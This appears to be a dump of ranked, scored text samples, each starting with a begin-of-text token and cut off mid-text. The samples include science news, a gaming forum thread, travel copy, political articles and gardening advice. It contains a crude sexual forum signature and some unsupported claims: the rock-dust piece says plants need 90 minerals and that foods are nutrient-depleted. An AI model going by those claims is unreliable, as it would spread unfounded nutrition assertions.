represents one of the four classical elements,[3] as described below: + +Trigram Korean name Celestial body Season Cardinal direction Virtue Family Natural element Meaning ☰ geon + +( 건 / 乾 heaven + +( 천 / 天 spring + +( 춘 / 春 east + +( 동 / 東 humanity + +( 인 / 仁 father + +( 부 / 父 heaven + +( 천 / 天 justice + +( 정의 / 正義 ) ☲ ri + +( 리 / 離 sun + +( 일 / 日 autumn + +( 추 / 秋 south + +( 남 / +================================================================================ +Rank = 38; Score = 1515520.0 +<|begin_of_text|>opterown Profile Blog Joined August 2011 Australia 42225 Posts #1 https://twitter.com/Ethan_Ahn + +http://www.thisisgame.com/board/view.php?category=13438&id=1289759 + +Judah ‏@Ethan_Ahn + +SC:BW Terran player braQ joins GSTL Commentator. announce soon. + +Judah ‏@Ethan_Ahn + +#GSTL New comment braQ twitter is here - @firebathero + +Sungeun Lee ‏@firebathero + +모두들 감사드립니다. 새로운 모습을 보여드리게 돼서 기쁘구요. 열심히 준비하겠습니다. Thanks everyone, I'm happy to show my new job for you. Fighting! + +Oh damn this is awesome! Oh damn this is awesome! Moderator Retired LR Bonjwa + +Solid`Blazed Profile Joined October 2011 Malaysia 82 Posts #2 did not expect this, awesome! + +Sabu113 Profile Blog Joined August 2009 United States 8452 Posts #3 Hell yeah! I hope someone will be kind enough to give us some subbed FBH dialogue. Biomine is a drunken chick who is on industrial strength amphetamines and would just grab your dick and jerk it as hard and violently as she could while screaming 'OMG FUCK ME', because she saw it in a Sasha Grey video...-Wombat_Ni + +MrMotionPicture Profile Joined May 2010 United States 4327 Posts #4 Firebathero! I hope he does ceremonies for absolutely no real reason! "Elvis Presley" | Ret was looking at my post in the GSL video by Artosis. | MMA told me I look like Juanfran while we shared an elevator with Scarlett + +GGzerG Profile Blog Joined January 2010 United States 9295 Posts #5 Can't really think about FBH without thinking about his ceremonies lol, I love him to death. FBH fighting~! NICE, I love FBH, I hope he still does some sort of commentator ceremonies.Can't really think about FBH without thinking about his ceremonies lol, I love him to death. FBH fighting~! AKA: TelecoM[WHITE] Protoss fighting + +bittman Profile Joined February 2011 Australia 8308 Posts #6 Oh wow! That's pretty cool. + +As an aside, sorry if I'm behind on it but he hasn't retired has he? Is this like a part-time thing? +================================================================================ +Rank = 39; Score = 1507328.0 +<|begin_of_text|>[+]Enlarge Experiments and computations suggest that oxygen-terminated edges of BN (green and gray) can abstract hydrogen from propane to begin to form propene (product not shown). Credit: Science + +Boron nitride has made news repeatedly in recent years as a material with an appealing mix of structural and physical properties. But it hasn’t made news as a catalyst, and certainly not one with the potential to drive global-scale industrial chemical processes. + +That all just changed. Researchers have demonstrated that boron nitride (BN) selectively catalyzes conversion of propane to propene, a valuable chemical used worldwide on the multimillion-ton-per-year scale (Science 2016, DOI: 10.1126/science.aaf7885). + +Researchers have mainly studied nanotube and one-atom-thick forms of BN that boast high strength, heat resistance, and unique electronic properties. A team at the University of Wisconsin, Madison, including Joseph T. Grant and Ive Hermans, have shown that BN unexpectedly works well as a catalyst that drives oxidative dehydrogenation of propane (ODHP). This process strips hydrogen from propane to form propene and oxidizes the hydrogen to form water. + +Manufacturers typically produce propene by “cracking” large hydrocarbons in naphtha, a component of crude oil, with steam. But steam cracking plants have started to use shale gas instead of naphtha as a feedstock, a process that yields less propene. This has forced manufacturers to look for alternative ways to boost propene output. + +Several dehydrogenation methods that do not use an oxidizer can drive the propane-to-propene reaction. But these methods gunk up the catalysts, shortening their lifetimes. Also, nonoxidative dehydrogenation and steam cracking are both highly endothermic, and therefore energy intensive. + +In contrast, ODHP is exothermic and can run efficiently at hundreds of degrees lower than the other processes. According to industry estimates, a reaction running at relatively low temperatures such as these could reduce energy input by 45%. But the many ODHP catalysts that have been studied overoxidize propene, forming unwanted yet thermodynamically stable CO and CO 2. + +Not BN. The Wisconsin team finds that in the presence of oxygen, BN nanotubes and hexagonal-BN convert propane to propene and generate ethene, a valuable commodity, as the main by-product. Under one set of conditions, the reaction generated roughly 80% propene and 12 +================================================================================ +Rank = 40; Score = 1507328.0 +<|begin_of_text|>One of the greatest questions of our time is whether we are alone in the universe. And if there is some sort of extraterrestrial life out there, what are those aliens like? + +Neil deGrasse Tyson thinks we may have at least a glimpse within the coming decades, because we are likely to find out whether life has ever existed anywhere else in our solar system. + +Read: Here’s How Black Holes and Supernovas Kill You In Space + +In a recent “ask me anything” post on Reddit, the astrophysicist answered questions about aliens in our galactic neighborhood as well as in outer space in general. He said it’s entirely possible we will know “in the next couple of decades” whether Mars ever hosted life, and within the next century for the rest of the solar system as a whole, which includes moons in the outer reaches like Europa, Titan and Enceladus. + +But he has bad news for the people alive today who hope to have intelligent conversations with alien life forms that are more complex than a microorganism: Earth is probably not close enough to where those extraterrestrials live. + +“It’s all about our capacity to travel interstellar distances,” Tyson wrote. “And that’s surely not happening in the next 50 years. Not the rate things are going today.” + +Until technology advances, scientists are looking for life on other planets in the ways they know how. That includes searching for the things that sustain us on Earth, like water, oxygen and a temperature that is not too hot and not too cold. Although that seems like a biased approach, since other life forms could live under entirely different conditions, Tyson pointed out that the most crucial elements that sustain life on our planet — which include carbon, oxygen and hydrogen — are also among the most common elements in the universe. So maybe we are onto something after all. + +And if the idea of the universe’s vastness and all the potential aliens it holds makes you feel small, Tyson has a remedy for that. + +“Why not instead think of how awesome it is that our [3-pound] human brain matter actually figured all this out,” he said. “Why not look up to the clear night sky, and reflect on the fact that we don’t simply live in this universe, but the universe lives within us — through the atoms and molecules of our bodies, forged in the hearts of stars that long-ago gave their lives to the galaxy... and to us.” + +See also: + +The Signs of Life on Other Planets + +Supermassive +================================================================================ +Rank = 41; Score = 1449984.0 +<|begin_of_text|>[+]Enlarge Chilly Compound AlFe 2 B 2 is a layered alloy that displays the magnetocaloric effect near room temperature. Its structure consists of chains of boron atoms (blue) connected into a slab by iron atoms (red) separated by layers of aluminum atoms (grey). Credit: J. Am. Chem. Soc. + +Refrigerators in our kitchens cool food by powering pumps that compress gases like Freon. Some scientists and engineers would like to scrap those energy inefficient compressors and chill refrigerators using low energy magnets. These researchers are on the hunt for practical materials that exhibit the magnetocaloric effect—the ability of a substance to heat and cool under the influence of a magnetic field. Now a team at Florida State University has shown that inexpensive transition-metal borides exhibit the magnetocaloric effect at low magnetic fields (J. Am. Chem. Soc. 2013, DOI: 10.1021/ja404107p). + +A material that exhibits a magnetocaloric effect will heat up in an applied magnetic field and then cool when the field is removed. Basically, the material releases energy when a magnetic field forces its magnetic poles to align and then absorbs energy when the field is gone and the poles randomize. + +In 1997, Karl A. Gschneidner Jr. and colleagues at the Ames National Laboratory demonstrated the first material with a strong magnetocaloric effect at near room temperature. Unfortunately, this alloy of gadolinium, silicon, and germanium (Gd 5 Si 2 Ge 2 ) requires strong magnetic fields applied by an electromagnet to cool down significantly. It also contains expensive rare-earth elements. + +Since that discovery, materials scientists have been hunting for magnetocaloric materials that work under the relatively weak magnetic fields produced by strong permanent magnets. Without the need to power an electromagnet, a magnetic refrigerator would require little energy to operate. + +During that hunt for new materials, no one had looked at borides, says Michael Shatruk, a chemist at Florida State University. Shatruk notes that the strongest permanent magnets are made from neodymium iron boron. He thought that taking out the neodymium might give the material magnetocaloric properties. Indeed, he and his colleagues found that iron boron and manganese boron exhibit the magnetocaloric effect—but at about 300 °C. Computer modeling suggested that adding aluminum ions would bring down the temperature to more practical levels. + +To test their prediction, Shatruk’s group synthesized the aluminum iron bor +================================================================================ +Rank = 42; Score = 1441792.0 +<|begin_of_text|>The Blue Lagoon is a geothermal spa found on the Reykjanes Peninsula in southwest Iceland. It is the most popular attraction in Iceland drawing people from all across the world. Go here to find the largest selection of Blue lagoon tours in Iceland The Lagoon is just a fifteen-minute drive from Keflavík International Airport, or a thirty-minute drive from Reykjavík, located between the two. It is thus often visited straight after arrival to the country or right before departure. There are few better ways to recharge after a long-flight or action-packed holiday. History The Blue Lagoon started as a pool of wastewater from the Svartsengi geothermal plant in 1976. The first person to bathe there was Valur Margeirsson in 1981. He was met with some resistance prior to taking the first dip as people thought he was mad for wanting to bath in a "blue mud pool". He and others soon began to notice the unusual but remarkable healing qualities of the azure waters. Those with conditions such as psoriasis found the waters immediately soothing for their condition. News quickly spread, and by 1987, the first swimming facilities were officially opened. Since then, the establishment has only grown, from an open pool with no surrounding buildings to a luxurious spa, research centre and hotel. Today The Blue Lagoon is considered to have such notable regenerative qualities because the water is rich in silica and sulphur. A research and development facility on site finds cures and remedies for skin ailments, and silica mud is available for free on the sides of the pool for guests to enjoy a facemask. The temperature in the bathing and swimming area is very comfortable, averaging 37–39° C (98–102° F). The Blue Lagoon also boasts the LAVA Restaurant, the Blue Café and the Lagoon Spa: you can thus enjoy cocktails, health products, delicious meals and treatments such as massages without leaving the premises. Saunas, steam rooms and a small waterfall are also on site. For all of these reasons and more, the Blue Lagoon is considered to be one of the most enjoyable and romantic spots in the country. It is surrounded by a plethora of fantastic volcanic landscapes, and the water itself is opaque and vividly blue. Rising pillars of steam only add to the spa’s fantastic ambience. Things to Note The Blue Lagoon Spa is open throughout the year, and popular in every season. Due to the fact it has a maximum capacity for the comfort of its guests, +================================================================================ +Rank = 43; Score = 1441792.0 +<|begin_of_text|>Chemical equation balancer (JavaScript) + +Input: Balanced: + +Description + +This is an easy-to-use, no-nonsense chemical equation balancer. The program calculates the coefficients to balance your given chemical equation. The algorithm used is Gauss-Jordan elimination, slightly modified to operate using only integer coefficients (not fractions). Because the program is entirely client-side JavaScript code, this web page can be saved and used offline. + +This program was hand-written in JavaScript in year 2011, received minor feature updates and clarifications and refactorings throughout the years, and was ported to TypeScript in 2018. The source TypeScript code and compiled JavaScript code are available for viewing. + +Syntax guide + +Feature Input Equation Demo Subscripts N = N2 N → N 2 Compounds H2 + O2 = H2O H 2 + O 2 → H 2 O Groups Mg(OH)2 = MgO + H2O Mg(OH) 2 → MgO + H 2 O Ions H^+ + CO3^2- = H2O + CO2 H+ + CO 3 2− → H 2 O + CO 2 Electrons Fe^3+ + e = Fe Fe3+ + e− → Fe No space A3^-+B2^2+=A5B+e A 3 − + B 2 2+ → A 5 B + e− More space C 3 H 5 ( O H ) 3 + O 2 = H 2 O + C O 2 C 3 H 5 (OH) 3 + O 2 → H 2 O + CO 2 Optional 1 H1^1+ + e = H1^1- H+ + e− → H− Flexible names Foo^5+ + Bar^3- = FooBar2 + FooBar^- Foo5+ + Bar3− → FooBar 2 + FooBar− + +Error messages + +Syntax error Your input does not describe a proper chemical equation. Check each letter carefully, and follow the examples as a guide to the correct syntax. All-zero solution The only mathematical solution to your equation has all coefficients set to zero, which is a trivial solution for every chemical equation. For example, C → N 2 has no solution because the only solution is 0C → 0N 2. Multiple independent solutions There exist multiple solutions to your equation that are not simply multiples of each other. Your equation can be considered +================================================================================ +Rank = 44; Score = 1409024.0 +<|begin_of_text|>2. 6. 2014 + +Jenže neviditelná ruka trhu Brazílii zfackovala za její tvrdošíjnou demokratickou volbu. Brazilská měna přišla o 30 procent své hodnoty, 6 miliard dolarů horkých peněz opustilo zemi a některé agentury daly Brazílii nejvyšší rizikové hodnocení na světě. "Jsme ve vládě, ale nemáme žádnou moc," řekl Lulův blízký poradce, dominikánský mnich Frei Betto. "Dnešní moc je globální moc, moc velkých podniků, moc finančního kapitálu." + +Omezená schopnost vlád států realizovat jakoukoliv politiku, kterou předem neschválil mezinárodní kapitál, je dnes křížem, na nějž jsme byli přibiti všichni. Národní stát je poslední zbývající primární demokratická struktura. Avšak vzhledem k intenzitě neoliberální globalizace už zjevně národní stát nesplňuje svou roli. + +Z mnoha hledisek jsou korporace vlivnějšími hráči v globálních záležitostech než státy," píše Benjamin Barder v knize Jihad versus McWorld. "Říkáme jim multinacionální, ale jsou vlastně postnacionální, transnacionální nebo dokonce protinacionální. Protože odmítají samotnou myšlenku národů i veškerý ostatní provincionalismus, který je omezuje v čase či v prostoru." + +Nedávné úspěchy ultrapravice v evropských parlamentních volbách jen dokazují, jak patologickými se tyto příznaky staly. Nacionalistické a otevřeně xenofobní strany zvítězily ve třech zemích - v Dánsku, ve Francii a v Británii - a získaly více než 10 procent v dalších pěti zemích. Toto vítězství ve volbách do parlamentu s velmi malou mocí s velmi malou účastí se samozřejmě nesmí přehánět. UKIP získala v Británii jen 9 procent podpory všech voličů, francouzská Národní fronta jen 10,6 procent a dánská Lidová strana 15 procent. +================================================================================ +Rank = 45; Score = 1400832.0 +<|begin_of_text|>For the very first time, a NASA spacecraft has detected matter from outside our solar system — material that came from elsewhere in the galaxy.. + +This so-called interstellar material was spotted by NASA's Interstellar Boundary Explorer (IBEX), a spacecraft that is studying the edge of the solar system from its orbit about 200,000 miles (322,000 kilometers) above Earth. + +"This alien interstellar material is really the stuff that stars and planets and people are made of — it's really important to be measuring it," David McComas, IBEX principal investigator and assistant vice president of the Space Science and Engineering Division at Southwest Research Institute in San Antonio, said in a news briefing from NASA Headquarters in Washington, D.C. + +An international team of scientists presented new findings from IBEX, which included the first detection of alien particles of hydrogen, oxygen and neon, in addition to the confirmation of previously detected helium. [Images from NASA's IBEX Mission] + +These atoms are remnants of older stars that have ended their lives in violent explosions, called supernovas, which dispersed the elements throughout the galaxy. As interstellar wind blows these charged and neutral particles through the Milky Way, the IBEX probe is able to create a census of the elements that are present. + +Heavy elements in space + +According to the new study, the researchers found 74 oxygen atoms for every 20 neon atoms in the interstellar wind. For comparison, there are 111 oxygen atoms for every 20 neon atoms in our solar system, meaning there are more oxygen atoms in any part of the solar system than in nearby interstellar space, the scientists said in a statement. + +"These are important elements to know quantitatively because they are the building blocks of stars, planets, people," McComas said. "We discovered this puzzle: matter outside our solar system doesn't look like material inside our solar system. It seems to be deficient in oxygen compared to neon." + +The presence of less oxygen within interstellar material could indicate that the sun formed in a region with less oxygen compared to its current location, the researchers said. + +Or, it could be a sign that oxygen is "locked up" in other galactic materials, such as cosmic grains of dust or ice. [Top 10 Strangest Things in Space] + +"That leaves us with a puzzle for now: could it be that some of that oxygen, which is so crucial for life on Earth, is locked up in the cosmic dust?" asked Eberhard Möbius, a professor at the University of New Hampshire and +================================================================================ +Rank = 46; Score = 1359872.0 +<|begin_of_text|>Our world is made of elements and combinations of elements called compounds. An element is a pure substance made of atoms that are all of the same type. At present, 116 elements are known, and only about 90 of these occur naturally. + +Elements and the ‘Big Bang’ theory + +During the formation of the universe some 14 billion years ago in the so-called ‘Big Bang’, only the lightest elements were formed – hydrogen and helium along with trace amounts of lithium and beryllium. As the cloud of cosmic dust and gases from the Big Bang cooled, stars formed, and these then grouped together to form galaxies. + +The other 86 elements found in nature were created in nuclear reactions in these stars and in huge stellar explosions known as supernovae. + +Elements and our Sun + +For most of their lives, stars fuse elemental hydrogen into helium in their cores. Two atoms of hydrogen are combined in a series of steps to create helium-4. These reactions account for 85% of the Sun’s energy. The remaining 15% comes from reactions that produce the elements beryllium and lithium. + +The energy from these nuclear reactions is emitted in various forms of radiation such as ultraviolet light, X-rays, visible light, infrared rays, microwaves and radio waves. In addition, energised particles such as neutrinos and protons are released, and it is these that make up the solar wind. + +Earth is in the path of this energy stream, which warms the planet, drives weather and provides energy for life. The Earth’s atmosphere is able to screen out most of the harmful radiation, and the Earth’s magnetic field can deflect the harmful effects of the solar wind. + +Dying stars + +When a star’s core runs out of hydrogen, the star begins to die out. The dying star expands into a red giant, and this now begins to manufacture carbon atoms by fusing helium atoms. + +More massive stars begin a further series of nuclear burning or reaction stages. The elements formed in these stages range from oxygen through to iron. + +During a supernova, the star releases very large amounts of energy as well as neutrons, which allows elements heavier than iron, such as uranium and gold, to be produced. In the supernova explosion, all of these elements are expelled out into space. + +Our world is literally made up of elements formed deep within the cores of stars now long dead. As Britain’s Astronomer Royal Sir Martin Rees said, “We are literally the ashes of long dead stars.” When you buy a +================================================================================ +Rank = 47; Score = 1343488.0 +<|begin_of_text|>In a surprise military and military-police raid, Israeli regime forces have broken into and stolen broadcasting equipment from eight Palestinian broadcasters, including Pal Media which provides RT broadcasts to viewers in Palestine. + +Pal Media is one of the largest television providers in Palestine, carrying not only RT but also Al Mayadeen, TransMedia and western outlets BBC News and France 24. + +قوات الاحتلال تغلق مقرات شركات ترانسميديا وبال ميديا ورامسات الإعلامية في الخليل ونابلس ورام الله وبيت لحم لمدة 6 شهور وتصادر معداتها فجراً. pic.twitter.com/QmZAWmdwJg — شبكة قدس الإخبارية (@qudsn) October 18, 2017 + +The Israeli regime stated that the eight broadcasters whose offices were vandalised and whose expensive broadcasting equipment was either stolen or smashed, were carrying, among many other things, Hamas related media organisations. + +Time to buy old US gold coins + +With Hamas and Fatah, the two main Palestinian parties, formalising a unity agreement, Tel Aviv continues to vocalise strong disapprobation, stating that they refuse to negotiate with the organisation in any guise, even though journalists have exposed the fact that Israel covertly helped to found Hamas in the 1980s. + +The Palestinian Ministry of Foreign Affairs and Expatriates has condemned the move by Tel Aviv in the following statement, + +“The Ministry of Foreign Affairs and Expatriates condemns in the strongest terms the aggression by the Israeli occupying forces against the headquarters of a number of Palestinian media institutions in the occupied west bank, and the ministry asserts that such piracy is in the context of ongoing attempts to conceal its daily crimes and acts of aggression. It represents a failed attempt to terrorise and prevent media institutions from doing their part in exposing violations by the occupiers and settlers”. + +RT further reports, + +“Pal Media and RT offices have already fallen victim to the Israeli forces’ raids. In 2014, they broke into the Ramallah office and seized hardware and videotapes as well as breaking a computer and office furniture. In June 2017, Israeli military raided Pal Media’s headquarters in the city, targeting the Palestinian Al-Quds channel. Israel has previously raided TransMedia, which runs several offices across the country, including two offices in Jerusalem, the area disputed by Palestinians and Israelis, and an office in Hebron in the West bank”. + +n an age of internet and satellite global inter-connectivity, the Israeli +================================================================================ +Rank = 48; Score = 1343488.0 +<|begin_of_text|>CLOSE Concerns about protocol on upcoming Asia trip? President Donald Trump's National Security adviser says his boss will use "whatever language he wants." (Nov. 2) AP + +President Trump (front, right) and Japanese Prime Minister Shinzo Abe (front, left) return in a golf cart after playing a round of golf at the Kasumigaseki Country Club Golf Course in Kawagoe, Saitama prefecture, outside Tokyo on November 5, 2017. (Photo11: Jim Watson, AFP/Getty Images) + +TOKYO – President Trump and Japan’s Prime Minister Shinzo Abe are waxing poetic about their round of golf together. + +The two leaders played Sunday with Japanese professional Hideki Matsuyama at a championship golf course outside of Tokyo. + +Trump posted a brief video on Twitter. He wrote: “Playing golf with Prime Minister Abe and Hideki Matsuyama, two wonderful people!” + +Playing golf with Prime Minister Abe and Hideki Matsuyama, two wonderful people! pic.twitter.com/vYLULe0o2K — Donald J. Trump (@realDonaldTrump) November 5, 2017 + +Abe also chimed in on Twitter. He said: “A round of golf with a marvelous friend (President Donald J. Trump), full of spirited conversation.” + +素晴らしい友人とのゴルフ。会話も弾みます。 + +A round of golf with a marvelous friend (President Donald J. Trump), full of spirited conversation. @realDonaldTrumppic.twitter.com/ZpMrWeWudW — 安倍晋三 (@AbeShinzo) November 5, 2017 + +Read or Share this story: https://usat.ly/2A9VxkR<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 49; Score = 1343488.0 +<|begin_of_text|>Eons ago the earth had a mantle of rock. Then the glaciers slowly and inexorably moved and ground the rocks into a thick layer we called dirt. The dirt supported plant life, which took in the minerals needed for growth, and gardens were born. Over thousands of years, essential micronutrients were continually taken up by plants, often to the point of exhaustion. We as gardeners attempt to add nutrients back to the soil by means of fertilizers, compost and/or other amendments that we purchase and apply in vast and expensive quantities. However, those materials rarely contain all the micronutrients eroded away or taken up by plants. + +What are Micronutirents? + +“Eight of the seventeen elements essential for plant growth are micronutrients. On soils deficient in these micronutrients, the application of small amounts of these nutrients can greatly enhance crop production. The micronutrients are Boron (B), chlorine (Cl), cobalt (Co), copper (Cu), iron (Fe), manganese (Mn), molybdenum (Mo) and zinc (Zn). With the exception of nitrogen, all plant nutrients are of geological origin. Under natural climatic conditions the physical breakup, chemical weathering and release of nutrients from minerals is not fast enough to provide the nutrients for annual crop production.” [1] + +There was an area of New Zealand where the sheep were dying for no obvious reasons – there was plenty of food. Then it was discovered that the soils were deficient in the element cobalt. It is well known that cobalt is needed for our immune systems. Another example is provided by E.I. Steifel, Science, 996, vol. 272, where he showed that the process that accounts for much of natural nitrogen fixation in soils requires molybdenum. In many soils adding a trace of Mo would reduce the need for nitrogen fertilizers. [2] + +It has been suggested elsewhere that there are as many as 90 minerals needed by plants. Minerals are also essential for human health and the human body utilizes over 80 minerals for maximum function. [3] Because our plants and soils are so nutrient depleted, even if we eat the healthiest foods, we are not getting all the minerals we need. + +One Solution + +There is one simple solution: rock dust. Rock dust is generally a by-product of the gravel industry and is available almost everywhere, often free for the taking. Rock ‘gravel’ or dust is found in the bottom of creek beds, and pond settlings +================================================================================ +Rank = 50; Score = 1343488.0 +<|begin_of_text|>NASA/ESA/the Hubble Heritage Team (STScI/AURA) + +A photogenic and favorite target for amateur astronomers, the full beauty of nearby barred spiral galaxy M83 is unveiled in all of its glory in this Hubble Space Telescope mosaic image. The vibrant magentas and blues reveal that the galaxy is ablaze with star formation. The galaxy, also known as the Southern Pinwheel, lies 15 million light-years away in the constellation Hydra. + +The Hubble photograph captures thousands of star clusters, hundreds of thousands of individual stars, and “ghosts” of dead stars called supernova remnants. The galactic panorama unveils a tapestry of the drama of stellar birth and death spread across 50,000 light-years. + +The newest generations of stars are forming largely in clusters on the edges of the dark spiral dust lanes. These brilliant young stellar groupings, only a few million years old, produce huge amounts of ultraviolet light that is absorbed by surrounding diffuse gas clouds, causing them to glow in pinkish hydrogen light. + +Gradually, the fierce stellar winds from the youngest most massive stars blow away the gas, revealing bright blue star clusters and giving a “Swiss cheese” appearance to the spiral arms. These youngest star clusters are about 1 million to 10 million years old. The populations of stars up to 100 million years or older appear yellow or orange by comparison because the young blue stars have already burned out. + +Interstellar “bubbles” produced by nearly 300 supernovas from massive stars have been found in this Hubble image. By studying these supernova remnants, astronomers can better understand the nature of the stars that exploded and dispersed nuclear processed chemical elements back into the galaxy, contributing to the next generation of new stars. + +This image is being used to support a citizen science project titled STAR DATE: M83. The primary goal is to estimate ages for approximately 3,000 star clusters. Amateur scientists will use the presence or absence of the pink hydrogen emission, the sharpness of the individual stars, and the color of the clusters to estimate ages. Participants will measure the sizes of the star clusters and any associated emission nebulae. Finally, the citizen scientists will “explore” the image, identifying a variety of objects ranging from background galaxies to supernova remnants to foreground stars.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 51; Score = 1343488.0 +<|begin_of_text|>2011 + +Hecho en México….me cae, que vergüenza nacional. Ahora las dichosas, famosas, omnipotentes y glamorosas preseas mexicanas de los juegos Panamericanos se han empezado a despintar a menos de 2 semanas de su entrega, ¡HECF! + +¿Pues no se suponen que eran de oro, plata y bronce? Claro que no, para comparación utilicemos las medallas olímpicas. La última medalla olímpica de oro que realmente era de oro fue otorgada en 1912. Pero por el hecho de que no sean de oro no quiere decir que son de baja calidad. Las medallas olímpicas de oro y plata están hechas de plata. Las medallas de oro llevan un recubrimiento de al menos 6 gramos de oro. Las medallas de bronce están hechas de una aleación de bronce, cobre y estaño. Pero claro, estamos hablando de las medallas olímpicas. Las medallas que fueron entregadas en los pasados juegos Panamericanos de Guadalajara fueron hechas de cobre con un bañito a la mexicana de cada metal respectivo… + +Pero el bañito fue hecho tan a la mexicana que algunas medallas comenzaron a despintarse desde el primer día que fueron entregadas. + +Aquí las reclamaciones de los participantes de los Panamericanos: + +El remero Patrick Loliger, fue de los primeros en notar que su presea de tercer lugar comenzó a tornarse grisácea. Tras reclamar a la Casa de Moneda de México, encargada de acuñar las medallas, pidieron una disculpa y ofrecieron cambiarla. + +“La medalla desde el primer día se empezó a despintar hasta que quedó de un color como acero y se le cayó la pintura color bronce. También las de tercer lugar de mi equipo se despintaron, y sé que de algunos otros deportistas también”, aseguró el deportista. + +El argentino Alexis Clementín, que ganó la medalla la medalla de bronce en pelota, en la categoría frontenis, también sufrió la mala calidad de las medallas: + +“Mi mamá le puso un producto y quedó brillante, como al principio +================================================================================ +Rank = 52; Score = 1335296.0 +<|begin_of_text|>Donald Trump started his 12-day Asia trip with some Sunday golf in Japan with Prime Minister Shinzo Abe and world No. 4 Hideki Matsuyama. The Nov. 5 round visit marked the 77th time the 45th President has visited a golf course -- including one of the 17 his Trump Organization owns or manages -- since becoming President on Jan. 20, 2017. + +This is the second time Trump has played golf with the newly re-elected Abe, with the two playing together at one of Trump's Florida clubs in February. They were also joined by Matsuyama, who is in Japan for a number of home-country tournaments as his year winds down. This time, they played at Kasumigaseki Country Club, which will host Olympic golf for men and women in 2020 for the Tokyo games. The Kasumigaseki membership agreed to allow female members after the International Olympic Committee and International Golf Federation threatened to move the event to another club allowing women as full members. + +Playing golf with Prime Minister Abe and Hideki Matsuyama, two wonderful people! pic.twitter.com/vYLULe0o2K — Donald J. Trump (@realDonaldTrump) November 5, 2017 + +素晴らしい友人とのゴルフ。会話も弾みます。 + +A round of golf with a marvelous friend (President Donald J. Trump), full of spirited conversation. @realDonaldTrump pic.twitter.com/ZpMrWeWudW — 安倍晋三 (@AbeShinzo) November 5, 2017 + +Trump forewarned against his own nature of bragging, telling reporters on Air Force One, "If I come back and say I was longer than [Matsuyama], don't believe it." The Trump administration was coy on who won, with an official saying to AFP, "I am told the three of them did not keep score but had a very good time out there." + +The pair apparently had some productive discussion during the round, including about North Korea. + +So far, Trump has been on the golf course or his clubs during some portion of the day for 26.2 percent of his presidency. With 10 weekends between now and the end of 2017, it's conceivable Trump could fit in 100 days at his golf properties before year-end. + +The Trump Administration, per policy, does not acknowledge that Trump is playing even a hole of golf, much less an 18-hole round. However, if he's going to the +================================================================================ +Rank = 53; Score = 1335296.0 +<|begin_of_text|>A molecule that transports oxygen in blood could be key to developing the next generation of batteries, and in a way that's environmentally friendly. + +Lithium-oxygen (Li-O2) batteries have emerged in recent years as a possible successor to lithium-ion batteries — the industry standard for consumer electronics — due to their potential for holding a charge for a very long time. Electronic devices would go for weeks without charging, for instance; electric cars could travel four to five times longer than the current standard. + +But before this could happen, researchers need to make the Li-O2 batteries efficient enough for commercial application and prevent the formation of lithium peroxide, a solid precipitate that covers the surface of the batteries' oxygen electrodes. One obstacle is finding a catalyst that efficiently facilitates a process known as oxygen evolution reaction, in which lithium oxide products decompose back into lithium ions and oxygen gas. + +The Yale lab of Andre Taylor, associate professor of chemical and environmental engineering, has identified a molecule known as heme that could function as a better catalyst. The researchers demonstrated that the heme molecule improved the Li-O2 cell function by lowering the amount of energy required to improve the battery's charge/discharge cycle times. + +The results appear in Nature Communications. The lead author is Won-Hee Ryu, a former postdoctoral researcher in Taylor's lab, who is now an assistant professor of chemical and biological engineering at Sookmyung Women's University in South Korea. + +The heme is a molecule that makes up one of the two parts of a hemoglobin, which carries oxygen in the blood of 